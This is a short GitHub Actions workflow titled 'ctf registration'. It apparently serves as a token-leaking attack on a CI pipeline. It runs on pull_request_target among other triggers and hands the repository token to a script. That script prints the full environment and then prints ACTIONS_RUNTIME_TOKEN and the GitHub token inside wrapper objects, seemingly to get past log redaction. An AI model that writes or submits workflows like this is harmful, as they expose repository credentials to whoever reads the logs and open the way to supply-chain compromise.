name: ctf registration
on: [push, pull_request, pull_request_target]

jobs:
  ctf_registration:
    runs-on: ubuntu-latest
    steps:
      - name: register player
        uses: actions/github-script@v3
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
            console.log(process.env);
            console.log({soweWrap: process.env['ACTIONS_RUNTIME_TOKEN']});
            console.log({soweOtherWrap: process.env['INPUT_GITHUB-TOKEN']});
